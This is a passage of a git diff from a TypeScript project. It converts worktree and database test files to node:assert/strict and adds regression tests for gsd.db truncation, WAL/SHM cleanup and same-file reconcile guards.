-  assertTrue(fixMatches.some(m => m.id === 'bugfix'), 'Should include bugfix in matches');
+  assert.ok(fixMatches.length > 0, 'Should detect matches for "fix the login button"');
+  assert.ok(fixMatches.some(m => m.id === 'bugfix'), 'Should include bugfix in matches');
 
   // Should detect spike from "research" keyword
   const researchMatches = autoDetect('research authentication libraries');
-  assertTrue(researchMatches.length > 0, 'Should detect matches for "research"');
-  assertTrue(researchMatches.some(m => m.id === 'spike'), 'Should include spike in matches');
+  assert.ok(researchMatches.length > 0, 'Should detect matches for "research"');
+  assert.ok(researchMatches.some(m => m.id === 'spike'), 'Should include spike in matches');
 
   // Should detect hotfix from "urgent" keyword
   const urgentMatches = autoDetect('urgent production is down');
-  assertTrue(urgentMatches.length > 0, 'Should detect matches for "urgent"');
-  assertTrue(urgentMatches.some(m => m.id === 'hotfix'), 'Should include hotfix in matches');
+  assert.ok(urgentMatches.length > 0, 'Should detect matches for "urgent"');
+  assert.ok(urgentMatches.some(m => m.id === 'hotfix'), 'Should include hotfix in matches');
 
   // Should detect dep-upgrade from "upgrade" keyword
   const upgradeMatches = autoDetect('upgrade react to v19');
-  assertTrue(upgradeMatches.length > 0, 'Should detect matches for "upgrade"');
-  assertTrue(upgradeMatches.some(m => m.id === 'dep-upgrade'), 'Should include dep-upgrade in matches');
+  assert.ok(upgradeMatches.length > 0, 'Should detect matches for "upgrade"');
+  assert.ok(upgradeMatches.some(m => m.id === 'dep-upgrade'), 'Should include dep-upgrade in matches');
 
   // Multi-word triggers should score higher
   const projectMatches = autoDetect('create a new project from scratch');
   const projectMatch = projectMatches.find(m => m.id === 'full-project');
-  assertTrue(projectMatch !== undefined, 'Should detect full-project for "from scratch"');
+  assert.ok(projectMatch !== undefined, 'Should detect full-project for "from scratch"');
 
   // Empty input should return no matches
   const emptyMatches = autoDetect('');
-  assertEq(emptyMatches.length, 0, 'Empty input should return no matches');
+  assert.deepStrictEqual(emptyMatches.length, 0, 'Empty input should return no matches');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -123,11 +123,11 @@ console.log('\n── List Templates ──');
 
 {
   const output = listTemplates();
-  assertTrue(output.includes('Workflow Templates'), 'Should have header');
-  assertTrue(output.includes('bugfix'), 'Should list bugfix');
-  assertTrue(output.includes('spike'), 'Should list spike');
-  assertTrue(output.includes('hotfix'), 'Should list hotfix');
-  assertTrue(output.includes('/gsd start'), 'Should include usage hint');
+  assert.ok(output.includes('Workflow Templates'), 'Should have header');
+  assert.ok(output.includes('bugfix'), 'Should list bugfix');
+  assert.ok(output.includes('spike'), 'Should list spike');
+  assert.ok(output.includes('hotfix'), 'Should list hotfix');
+  assert.ok(output.includes('/gsd start'), 'Should include usage hint');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -138,13 +138,13 @@ console.log('\n── Template Info ──');
 
 {
   const info = getTemplateInfo('bugfix');
-  assertTrue(info !== null, 'Should return info for bugfix');
-  assertTrue(info!.includes('Bug Fix'), 'Should include template name');
-  assertTrue(info!.includes('triage'), 'Should include phase names');
-  assertTrue(info!.includes('Triggers'), 'Should include triggers section');
+  assert.ok(info !== null, 'Should return info for bugfix');
+  assert.ok(info!.includes('Bug Fix'), 'Should include template name');
+  assert.ok(info!.includes('triage'), 'Should include phase names');
+  assert.ok(info!.includes('Triggers'), 'Should include triggers section');
 
   const missing = getTemplateInfo('nonexistent');
-  assertTrue(missing === null, 'Should return null for unknown template');
+  assert.ok(missing === null, 'Should return null for unknown template');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -155,19 +155,17 @@ console.log('\n── Load Workflow Template ──');
 
 {
   const content = loadWorkflowTemplate('bugfix');
-  assertTrue(content !== null, 'Should load bugfix template');
-  assertTrue(content!.includes('Bugfix Workflow'), 'Should contain workflow title');
-  assertTrue(content!.includes('Phase 1: Triage'), 'Should contain triage phase');
-  assertTrue(content!.includes('Phase 4: Ship'), 'Should contain ship phase');
+  assert.ok(content !== null, 'Should load bugfix template');
+  assert.ok(content!.includes('Bugfix Workflow'), 'Should contain workflow title');
+  assert.ok(content!.includes('Phase 1: Triage'), 'Should contain triage phase');
+  assert.ok(content!.includes('Phase 4: Ship'), 'Should contain ship phase');
 
   const hotfixContent = loadWorkflowTemplate('hotfix');
-  assertTrue(hotfixContent !== null, 'Should load hotfix template');
-  assertTrue(hotfixContent!.includes('Hotfix Workflow'), 'Should contain hotfix title');
+  assert.ok(hotfixContent !== null, 'Should load hotfix template');
+  assert.ok(hotfixContent!.includes('Hotfix Workflow'), 'Should contain hotfix title');
 
   const missingContent = loadWorkflowTemplate('nonexistent');
-  assertTrue(missingContent === null, 'Should return null for unknown template');
+  assert.ok(missingContent === null, 'Should return null for unknown template');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
-
-report();
diff --git a/src/resources/extensions/gsd/tests/worktree-bugfix.test.ts b/src/resources/extensions/gsd/tests/worktree-bugfix.test.ts
index e0766c065..8f25e516d 100644
--- a/src/resources/extensions/gsd/tests/worktree-bugfix.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-bugfix.test.ts
@@ -14,12 +14,10 @@ import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { execSync } from "node:child_process";
 import { describe, it, after } from "node:test";
+import assert from 'node:assert/strict';
 
 import { resolveGitDir } from "../worktree-manager.ts";
 import { detectWorktreeName, captureIntegrationBranch } from "../worktree.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
 
 // ─── Helpers ──────────────────────────────────────────────────────────────
 
@@ -40,7 +38,6 @@ describe("worktree-bugfix", () => {
   const dirs: string[] = [];
   after(() => {
     for (const d of dirs) rmSync(d, { recursive: true, force: true });
-    report();
   });
 
   it("resolveGitDir returns .git directory in normal repo", () => {
@@ -48,8 +45,8 @@ describe("worktree-bugfix", () => {
     dirs.push(repo);
     initRepo(repo);
     const gitDir = resolveGitDir(repo);
-    assertTrue(gitDir.endsWith(".git"), "ends with .git");
-    assertTrue(existsSync(gitDir), ".git dir exists");
+    assert.ok(gitDir.endsWith(".git"), "ends with .git");
+    assert.ok(existsSync(gitDir), ".git dir exists");
   });
 
   it("resolveGitDir follows gitdir: pointer in worktree", () => {
@@ -65,18 +62,18 @@ describe("worktree-bugfix", () => {
     writeFileSync(join(wtDir, ".git"), `gitdir: ${realGitDir}\n`);
 
     const resolved = resolveGitDir(wtDir);
-    assertEq(resolved, realGitDir, "resolves to real git dir");
+    assert.deepStrictEqual(resolved, realGitDir, "resolves to real git dir");
   });
 
   it("resolveGitDir returns default when .git doesn't exist", () => {
     const noGit = mkdtempSync(join(tmpdir(), "gsd-wt-fix-"));
     dirs.push(noGit);
     const gitDir = resolveGitDir(noGit);
-    assertTrue(gitDir.endsWith(".git"), "returns default .git path");
+    assert.ok(gitDir.endsWith(".git"), "returns default .git path");
   });
 
   it("detectWorktreeName returns name for worktree path", () => {
-    assertEq(
+    assert.deepStrictEqual(
       detectWorktreeName("/project/.gsd/worktrees/M005"),
       "M005",
       "detects worktree name",
@@ -84,7 +81,7 @@ describe("worktree-bugfix", () => {
   });
 
   it("detectWorktreeName returns null for normal repo", () => {
-    assertEq(
+    assert.deepStrictEqual(
       detectWorktreeName("/project"),
       null,
       "null for non-worktree path",
@@ -106,7 +103,7 @@ describe("worktree-bugfix", () => {
     // captureIntegrationBranch should be a no-op — no META.json written
     const metaPath = join(wtPath, ".gsd", "milestones", "M005", "M005-META.json");
     captureIntegrationBranch(wtPath, "M005");
-    assertTrue(!existsSync(metaPath), "no META.json written in worktree");
+    assert.ok(!existsSync(metaPath), "no META.json written in worktree");
   });
 
   it("detectWorktreeName prevents pull in worktree context", () => {
@@ -114,7 +111,7 @@ describe("worktree-bugfix", () => {
     // the caller should skip pull/fetch operations
     const inWorktree = detectWorktreeName("/project/.gsd/worktrees/M006");
     const inNormal = detectWorktreeName("/project");
-    assertTrue(inWorktree !== null, "worktree detected → skip pull");
-    assertTrue(inNormal === null, "normal repo → allow pull");
+    assert.ok(inWorktree !== null, "worktree detected → skip pull");
+    assert.ok(inNormal === null, "normal repo → allow pull");
   });
 });
diff --git a/src/resources/extensions/gsd/tests/worktree-db-integration.test.ts b/src/resources/extensions/gsd/tests/worktree-db-integration.test.ts
index 92728ba23..0d4b098b6 100644
--- a/src/resources/extensions/gsd/tests/worktree-db-integration.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-db-integration.test.ts
@@ -29,9 +29,9 @@ import {
   isDbAvailable,
 } from "../gsd-db.ts";
 
-import { createTestContext } from "./test-helpers.ts";
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 function run(command: string, cwd: string): string {
   return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
@@ -49,7 +49,7 @@ function createTempRepo(): string {
   return dir;
 }
 
-async function main(): Promise<void> {
+describe('worktree-db-integration', async () => {
   const savedCwd = process.cwd();
   const tempDirs: string[] = [];
 
@@ -82,7 +82,7 @@ async function main(): Promise<void> {
       const wtPath = createAutoWorktree(tempDir, "M004");
 
       const worktreeDbPath = join(worktreePath(tempDir, "M004"), ".gsd", "gsd.db");
-      assertTrue(
+      assert.ok(
         existsSync(worktreeDbPath),
         "gsd.db exists in worktree .gsd after createAutoWorktree",
       );
@@ -107,10 +107,10 @@ async function main(): Promise<void> {
         console.error("  Unexpected throw:", err);
       }
 
-      assertTrue(!threw, "createAutoWorktree does not throw when no source DB");
+      assert.ok(!threw, "createAutoWorktree does not throw when no source DB");
 
       const worktreeDbPath = join(worktreePath(tempDir, "M004"), ".gsd", "gsd.db");
-      assertTrue(
+      assert.ok(
         !existsSync(worktreeDbPath),
         "gsd.db is absent in worktree when source had none",
       );
@@ -145,7 +145,7 @@ async function main(): Promise<void> {
 
       // Reconcile worktree → main
       const result = reconcileWorktreeDb(mainDbPath, worktreeDbPath);
-      assertTrue(result.decisions >= 1, "reconcile reports at least 1 decision merged");
+      assert.ok(result.decisions >= 1, "reconcile reports at least 1 decision merged");
 
       // Open main DB and verify the row is present
       openDatabase(mainDbPath);
@@ -153,7 +153,7 @@ async function main(): Promise<void> {
       closeDatabase();
 
       const found = decisions.some((d) => d.id === "D-WT-001");
-      assertTrue(found, "worktree decision D-WT-001 present in main DB after reconcile");
+      assert.ok(found, "worktree decision D-WT-001 present in main DB after reconcile");
     }
 
     // ─── Test 4: reconcile non-fatal when both paths nonexistent ─────
@@ -165,7 +165,7 @@ async function main(): Promise<void> {
       } catch {
         threw = true;
       }
-      assertTrue(!threw, "reconcileWorktreeDb does not throw when worktree DB is absent");
+      assert.ok(!threw, "reconcileWorktreeDb does not throw when worktree DB is absent");
     }
 
     // ─── Test 5: failure path observable via stderr (diagnostic) ─────
@@ -181,10 +181,10 @@ async function main(): Promise<void> {
       closeDatabase();
 
       const result = reconcileWorktreeDb(mainDbPath, "/definitely/does/not/exist.db");
-      assertEq(result.decisions, 0, "decisions is 0 when worktree DB absent");
-      assertEq(result.requirements, 0, "requirements is 0 when worktree DB absent");
-      assertEq(result.artifacts, 0, "artifacts is 0 when worktree DB absent");
-      assertEq(result.conflicts.length, 0, "conflicts is empty when worktree DB absent");
+      assert.deepStrictEqual(result.decisions, 0, "decisions is 0 when worktree DB absent");
+      assert.deepStrictEqual(result.requirements, 0, "requirements is 0 when worktree DB absent");
+      assert.deepStrictEqual(result.artifacts, 0, "artifacts is 0 when worktree DB absent");
+      assert.deepStrictEqual(result.conflicts.length, 0, "conflicts is empty when worktree DB absent");
     }
 
   } finally {
@@ -199,8 +199,4 @@ async function main(): Promise<void> {
       }
     }
   }
-
-  report();
-}
-
-main();
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-db-respawn-truncation.test.ts b/src/resources/extensions/gsd/tests/worktree-db-respawn-truncation.test.ts
new file mode 100644
index 000000000..009a0979d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-db-respawn-truncation.test.ts
@@ -0,0 +1,219 @@
+/**
+ * worktree-db-respawn-truncation.test.ts — Regression test for #2815.
+ *
+ * Verifies that syncProjectRootToWorktree does NOT delete a non-empty
+ * worktree gsd.db. On worker respawn, gsd-migrate populates the DB
+ * (~1.7MB) before the auto-loop calls syncProjectRootToWorktree. The
+ * sync step must preserve the freshly-migrated DB to avoid truncating
+ * it to 0 bytes and causing "no such table: slices" failures.
+ *
+ * Covers:
+ *   - Non-empty worktree gsd.db preserved after sync (#2815)
+ *   - Empty (0-byte) worktree gsd.db still deleted (#853 preserved)
+ *   - WAL/SHM sidecar files cleaned up when empty DB is deleted
+ */
+
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, readFileSync, statSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import { syncProjectRootToWorktree } from '../auto-worktree.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+
+
+function createBase(name: string): string {
+  const base = mkdtempSync(join(tmpdir(), `gsd-wt-respawn-${name}-`));
+  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+describe('worktree-db-respawn-truncation (#2815)', async () => {
+
+  // ─── 1. Non-empty worktree gsd.db preserved after sync ───────────────
+  console.log('\n=== 1. non-empty worktree gsd.db preserved after sync (#2815) ===');
+  {
+    const mainBase = createBase('main');
+    const wtBase = createBase('wt');
+
+    try {
+      // Set up milestone artifacts in main project root
+      const m001Dir = join(mainBase, '.gsd', 'milestones', 'M001');
+      mkdirSync(m001Dir, { recursive: true });
+      writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# Roadmap');
+
+      // Simulate a freshly-migrated worktree DB (non-empty, like after gsd-migrate)
+      // Real DBs are ~1.7MB; we use a smaller payload to prove the size check works
+      const fakeDbContent = Buffer.alloc(4096, 0x42); // 4KB non-empty DB
+      writeFileSync(join(wtBase, '.gsd', 'gsd.db'), fakeDbContent);
+
+      const sizeBefore = statSync(join(wtBase, '.gsd', 'gsd.db')).size;
+      assert.ok(sizeBefore > 0, 'gsd.db is non-empty before sync');
+
+      syncProjectRootToWorktree(mainBase, wtBase, 'M001');
+
+      // The non-empty DB must survive the sync
+      assert.ok(
+        existsSync(join(wtBase, '.gsd', 'gsd.db')),
+        '#2815: non-empty gsd.db must not be deleted by sync',
+      );
+      const sizeAfter = statSync(join(wtBase, '.gsd', 'gsd.db')).size;
+      assert.equal(
+        sizeAfter,
+        sizeBefore,
+        '#2815: gsd.db size must be unchanged after sync',
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  // ─── 2. Empty (0-byte) worktree gsd.db still deleted ─────────────────
+  console.log('\n=== 2. empty (0-byte) worktree gsd.db still deleted (#853) ===');
+  {
+    const mainBase = createBase('main');
+    const wtBase = createBase('wt');
+
+    try {
+      const m001Dir = join(mainBase, '.gsd', 'milestones', 'M001');
+      mkdirSync(m001Dir, { recursive: true });
+      writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# Roadmap');
+
+      // Create an empty (0-byte) gsd.db — this is stale/corrupt and should be deleted
+      writeFileSync(join(wtBase, '.gsd', 'gsd.db'), '');
+      assert.ok(existsSync(join(wtBase, '.gsd', 'gsd.db')), 'empty gsd.db exists before sync');
+
+      syncProjectRootToWorktree(mainBase, wtBase, 'M001');
+
+      assert.ok(
+        !existsSync(join(wtBase, '.gsd', 'gsd.db')),
+        '#853: empty gsd.db must still be deleted after sync',
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  // ─── 3. WAL/SHM sidecar files cleaned up when empty DB is deleted (#2478) ──
+  console.log('\n=== 3. orphaned WAL/SHM cleaned up alongside empty gsd.db (#2478) ===');
+  {
+    const mainBase = createBase('main');
+    const wtBase = createBase('wt');
+
+    try {
+      const m001Dir = join(mainBase, '.gsd', 'milestones', 'M001');
+      mkdirSync(m001Dir, { recursive: true });
+      writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# Roadmap');
+
+      // Create an empty (0-byte) gsd.db plus orphaned WAL and SHM files —
+      // this is the exact state that causes Node 24 node:sqlite CPU spin (#2478).
+      const wtGsd = join(wtBase, '.gsd');
+      writeFileSync(join(wtGsd, 'gsd.db'), '');
+      writeFileSync(join(wtGsd, 'gsd.db-wal'), Buffer.alloc(605672, 0xAA));
+      writeFileSync(join(wtGsd, 'gsd.db-shm'), Buffer.alloc(32768, 0xBB));
+
+      assert.ok(existsSync(join(wtGsd, 'gsd.db')), 'gsd.db exists before sync');
+      assert.ok(existsSync(join(wtGsd, 'gsd.db-wal')), 'gsd.db-wal exists before sync');
+      assert.ok(existsSync(join(wtGsd, 'gsd.db-shm')), 'gsd.db-shm exists before sync');
+
+      syncProjectRootToWorktree(mainBase, wtBase, 'M001');
+
+      assert.ok(
+        !existsSync(join(wtGsd, 'gsd.db')),
+        '#2478: empty gsd.db must be deleted',
+      );
+      assert.ok(
+        !existsSync(join(wtGsd, 'gsd.db-wal')),
+        '#2478: orphaned gsd.db-wal must be deleted alongside gsd.db',
+      );
+      assert.ok(
+        !existsSync(join(wtGsd, 'gsd.db-shm')),
+        '#2478: orphaned gsd.db-shm must be deleted alongside gsd.db',
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  // ─── 4. Orphaned WAL/SHM cleaned up even when gsd.db already missing (#2478) ──
+  console.log('\n=== 4. orphaned WAL/SHM cleaned up even without gsd.db (#2478) ===');
+  {
+    const mainBase = createBase('main');
+    const wtBase = createBase('wt');
+
+    try {
+      const m001Dir = join(mainBase, '.gsd', 'milestones', 'M001');
+      mkdirSync(m001Dir, { recursive: true });
+      writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# Roadmap');
+
+      // Orphaned WAL/SHM with NO gsd.db at all — can happen from a previous
+      // partial cleanup. These must still be cleaned up.
+      const wtGsd = join(wtBase, '.gsd');
+      writeFileSync(join(wtGsd, 'gsd.db-wal'), Buffer.alloc(1024, 0xAA));
+      writeFileSync(join(wtGsd, 'gsd.db-shm'), Buffer.alloc(1024, 0xBB));
+
+      assert.ok(!existsSync(join(wtGsd, 'gsd.db')), 'gsd.db does not exist');
+      assert.ok(existsSync(join(wtGsd, 'gsd.db-wal')), 'orphaned gsd.db-wal exists');
+      assert.ok(existsSync(join(wtGsd, 'gsd.db-shm')), 'orphaned gsd.db-shm exists');
+
+      syncProjectRootToWorktree(mainBase, wtBase, 'M001');
+
+      assert.ok(
+        !existsSync(join(wtGsd, 'gsd.db-wal')),
+        '#2478: orphaned gsd.db-wal must be deleted even without main db file',
+      );
+      assert.ok(
+        !existsSync(join(wtGsd, 'gsd.db-shm')),
+        '#2478: orphaned gsd.db-shm must be deleted even without main db file',
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+
+  // ─── 5. Milestone artifacts still synced when DB is preserved ────────
+  console.log('\n=== 5. milestone artifacts still synced even when DB preserved ===');
+  {
+    const mainBase = createBase('main');
+    const wtBase = createBase('wt');
+
+    try {
+      const m001Dir = join(mainBase, '.gsd', 'milestones', 'M001');
+      mkdirSync(m001Dir, { recursive: true });
+      writeFileSync(join(m001Dir, 'M001-ROADMAP.md'), '# Roadmap');
+      mkdirSync(join(m001Dir, 'slices', 'S01'), { recursive: true });
+      writeFileSync(join(m001Dir, 'slices', 'S01', 'S01-PLAN.md'), '# Plan');
+
+      // Non-empty DB in worktree
+      writeFileSync(join(wtBase, '.gsd', 'gsd.db'), 'populated-db-data');
+
+      syncProjectRootToWorktree(mainBase, wtBase, 'M001');
+
+      // Artifacts must still be synced
+      assert.ok(
+        existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md')),
+        'milestone artifacts synced even with preserved DB',
+      );
+      assert.ok(
+        existsSync(join(wtBase, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md')),
+        'slice artifacts synced even with preserved DB',
+      );
+      // DB must still exist
+      assert.ok(
+        existsSync(join(wtBase, '.gsd', 'gsd.db')),
+        '#2815: DB preserved alongside artifact sync',
+      );
+    } finally {
+      cleanup(mainBase);
+      cleanup(wtBase);
+    }
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-db-same-file.test.ts b/src/resources/extensions/gsd/tests/worktree-db-same-file.test.ts
new file mode 100644
index 000000000..6059d97dc
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-db-same-file.test.ts
@@ -0,0 +1,175 @@
+/**
+ * worktree-db-same-file.test.ts — Regression test for #2823.
+ *
+ * Verifies that reconcileWorktreeDb() does not ATTACH a WAL-mode DB file
+ * to itself when the worktree DB path resolves to the same physical file
+ * as the main DB path (shared-WAL / symlink layout).
+ *
+ * Also verifies that the auto-loop classifies "database disk image is
+ * malformed" as an infrastructure error to prevent wasting retries.
+ */
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  existsSync,
+  mkdirSync,
+  mkdtempSync,
+  rmSync,
+  symlinkSync,
+  writeFileSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  openDatabase,
+  closeDatabase,
+  reconcileWorktreeDb,
+  insertDecision,
+} from "../gsd-db.ts";
+import { isInfrastructureError } from "../auto/infra-errors.ts";
+
+// ─── Fix 1 & 2: reconcileWorktreeDb same-file guard ─────────────────
+
+describe("#2823: reconcileWorktreeDb same-file guard", () => {
+  let tmpDir: string;
+
+  beforeEach(() => {
+    tmpDir = mkdtempSync(join(tmpdir(), "gsd-2823-"));
+  });
+
+  afterEach(() => {
+    closeDatabase();
+    rmSync(tmpDir, { recursive: true, force: true });
+  });
+
+  test("returns zero result when both paths resolve to the same file", () => {
+    const mainGsd = join(tmpDir, "main", ".gsd");
+    mkdirSync(mainGsd, { recursive: true });
+    const mainDbPath = join(mainGsd, "gsd.db");
+
+    // Create a real DB at mainDbPath
+    openDatabase(mainDbPath);
+    insertDecision({
+      id: "D001",
+      when_context: "2026-01-01",
+      scope: "M001",
+      decision: "Test decision",
+      choice: "Test choice",
+      rationale: "Test rationale",
+      revisable: "yes",
+      made_by: "agent",
+      superseded_by: null,
+    });
+
+    // Create a worktree path that resolves to the same file via symlink
+    const wtGsd = join(tmpDir, "worktree", ".gsd");
+    mkdirSync(join(tmpDir, "worktree"), { recursive: true });
+    symlinkSync(mainGsd, wtGsd, "junction");
+    const worktreeDbPath = join(wtGsd, "gsd.db");
+
+    // Both paths exist and resolve to the same physical file
+    assert.ok(existsSync(mainDbPath), "main DB exists");
+    assert.ok(existsSync(worktreeDbPath), "worktree DB path exists (via symlink)");
+
+    // This should NOT attempt ATTACH — should return zero result
+    const result = reconcileWorktreeDb(mainDbPath, worktreeDbPath);
+
+    assert.equal(result.decisions, 0, "no decisions reconciled");
+    assert.equal(result.requirements, 0, "no requirements reconciled");
+    assert.equal(result.artifacts, 0, "no artifacts reconciled");
+    assert.equal(result.conflicts.length, 0, "no conflicts");
+  });
+
+  test("returns zero result when both paths are identical strings", () => {
+    const mainGsd = join(tmpDir, "project", ".gsd");
+    mkdirSync(mainGsd, { recursive: true });
+    const dbPath = join(mainGsd, "gsd.db");
+
+    openDatabase(dbPath);
+    insertDecision({
+      id: "D001",
+      when_context: "2026-01-01",
+      scope: "M001",
+      decision: "Test",
+      choice: "Test",
+      rationale: "Test",
+      revisable: "yes",
+      made_by: "agent",
+      superseded_by: null,
+    });
+
+    // Same exact path — should bail immediately
+    const result = reconcileWorktreeDb(dbPath, dbPath);
+
+    assert.equal(result.decisions, 0);
+    assert.equal(result.conflicts.length, 0);
+  });
+
+  test("still reconciles when paths are genuinely different files", () => {
+    // Main DB
+    const mainGsd = join(tmpDir, "main", ".gsd");
+    mkdirSync(mainGsd, { recursive: true });
+    const mainDbPath = join(mainGsd, "gsd.db");
+
+    openDatabase(mainDbPath);
+    insertDecision({
+      id: "D001",
+      when_context: "2026-01-01",
+      scope: "M001",
+      decision: "Main decision",
+      choice: "Main choice",
+      rationale: "Main rationale",
+      revisable: "yes",
+      made_by: "agent",
+      superseded_by: null,
+    });
+    closeDatabase();
+
+    // Create a separate worktree DB with different data
+    const wtGsd = join(tmpDir, "worktree", ".gsd");
+    mkdirSync(wtGsd, { recursive: true });
+    const worktreeDbPath = join(wtGsd, "gsd.db");
+
+    openDatabase(worktreeDbPath);
+    insertDecision({
+      id: "D002",
+      when_context: "2026-01-01",
+      scope: "M001",
+      decision: "WT decision",
+      choice: "WT choice",
+      rationale: "WT rationale",
+      revisable: "yes",
+      made_by: "agent",
+      superseded_by: null,
+    });
+    closeDatabase();
+
+    // Re-open main and reconcile — should work normally
+    openDatabase(mainDbPath);
+    const result = reconcileWorktreeDb(mainDbPath, worktreeDbPath);
+
+    assert.ok(
+      result.decisions > 0,
+      "should reconcile decisions from a genuinely different DB",
+    );
+  });
+});
+
+// ─── Fix 3: infrastructure error classification ─────────────────────
+
+describe("#2823: malformed DB classified as infrastructure error", () => {
+  test("database disk image is malformed is detected as infra error", () => {
+    const err = new Error("database disk image is malformed");
+    const code = isInfrastructureError(err);
+    assert.ok(code !== null, "should be classified as infrastructure error");
+    assert.equal(code, "SQLITE_CORRUPT");
+  });
+
+  test("other SQLite errors are not falsely classified", () => {
+    const err = new Error("SQLITE_BUSY: database is locked");
+    const code = isInfrastructureError(err);
+    assert.equal(code, null, "SQLITE_BUSY should not be infra error (it's transient)");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-db.test.ts b/src/resources/extensions/gsd/tests/worktree-db.test.ts
index d757947ec..dd97a0495 100644
--- a/src/resources/extensions/gsd/tests/worktree-db.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-db.test.ts
@@ -1,4 +1,5 @@
-import { createTestContext } from './test-helpers.ts';
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 import * as fs from 'node:fs';
 import * as path from 'node:path';
 import * as os from 'node:os';
@@ -16,7 +17,6 @@ import {
   reconcileWorktreeDb,
 } from '../gsd-db.ts';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Helpers
@@ -91,18 +91,18 @@ console.log('\n=== worktree-db: copyWorktreeDb ===');
   closeDatabase();
 
   const result = copyWorktreeDb(srcDb, destDb);
-  assertTrue(result === true, 'copyWorktreeDb returns true on success');
-  assertTrue(fs.existsSync(destDb), 'dest DB file exists after copy');
+  assert.ok(result === true, 'copyWorktreeDb returns true on success');
+  assert.ok(fs.existsSync(destDb), 'dest DB file exists after copy');
 
   // Open the copy and verify data is queryable
   openDatabase(destDb);
   const d = getDecisionById('D001');
-  assertTrue(d !== null, 'decision queryable in copied DB');
-  assertEq(d?.choice, 'node:sqlite', 'decision data preserved in copy');
+  assert.ok(d !== null, 'decision queryable in copied DB');
+  assert.deepStrictEqual(d?.choice, 'node:sqlite', 'decision data preserved in copy');
 
   const r = getRequirementById('R001');
-  assertTrue(r !== null, 'requirement queryable in copied DB');
-  assertEq(r?.description, 'Must store decisions', 'requirement data preserved in copy');
+  assert.ok(r !== null, 'requirement queryable in copied DB');
+  assert.deepStrictEqual(r?.description, 'Must store decisions', 'requirement data preserved in copy');
 
   cleanup(srcDir, destDir);
 }
@@ -123,9 +123,9 @@ console.log('\n=== worktree-db: copyWorktreeDb ===');
 
   copyWorktreeDb(srcDb, destDb);
 
-  assertTrue(fs.existsSync(destDb), 'DB file copied');
-  assertTrue(!fs.existsSync(destDb + '-wal'), 'WAL file NOT copied');
-  assertTrue(!fs.existsSync(destDb + '-shm'), 'SHM file NOT copied');
+  assert.ok(fs.existsSync(destDb), 'DB file copied');
+  assert.ok(!fs.existsSync(destDb + '-wal'), 'WAL file NOT copied');
+  assert.ok(!fs.existsSync(destDb + '-shm'), 'SHM file NOT copied');
 
   cleanup(srcDir, destDir);
 }
@@ -134,7 +134,7 @@ console.log('\n=== worktree-db: copyWorktreeDb ===');
 {
   const destDir = tempDir();
   const result = copyWorktreeDb('/nonexistent/path/gsd.db', path.join(destDir, 'gsd.db'));
-  assertEq(result, false, 'returns false for missing source');
+  assert.deepStrictEqual(result, false, 'returns false for missing source');
   cleanup(destDir);
 }
 
@@ -149,8 +149,8 @@ console.log('\n=== worktree-db: copyWorktreeDb ===');
   closeDatabase();
 
   const result = copyWorktreeDb(srcDb, deepDest);
-  assertTrue(result === true, 'copyWorktreeDb succeeds with nested dest');
-  assertTrue(fs.existsSync(deepDest), 'DB file created at deeply nested path');
+  assert.ok(result === true, 'copyWorktreeDb succeeds with nested dest');
+  assert.ok(fs.existsSync(deepDest), 'DB file created at deeply nested path');
 
   cleanup(srcDir, destDir);
 }
@@ -192,10 +192,10 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   openDatabase(mainDb);
   const result = reconcileWorktreeDb(mainDb, wtDb);
 
-  assertTrue(result.decisions > 0, 'decisions merged count > 0');
+  assert.ok(result.decisions > 0, 'decisions merged count > 0');
   const d2 = getDecisionById('D002');
-  assertTrue(d2 !== null, 'D002 from worktree now in main');
-  assertEq(d2?.choice, 'WAL', 'D002 data correct after merge');
+  assert.ok(d2 !== null, 'D002 from worktree now in main');
+  assert.deepStrictEqual(d2?.choice, 'WAL', 'D002 data correct after merge');
 
   cleanup(mainDir, wtDir);
 }
@@ -231,10 +231,10 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   openDatabase(mainDb);
   const result = reconcileWorktreeDb(mainDb, wtDb);
 
-  assertTrue(result.requirements > 0, 'requirements merged count > 0');
+  assert.ok(result.requirements > 0, 'requirements merged count > 0');
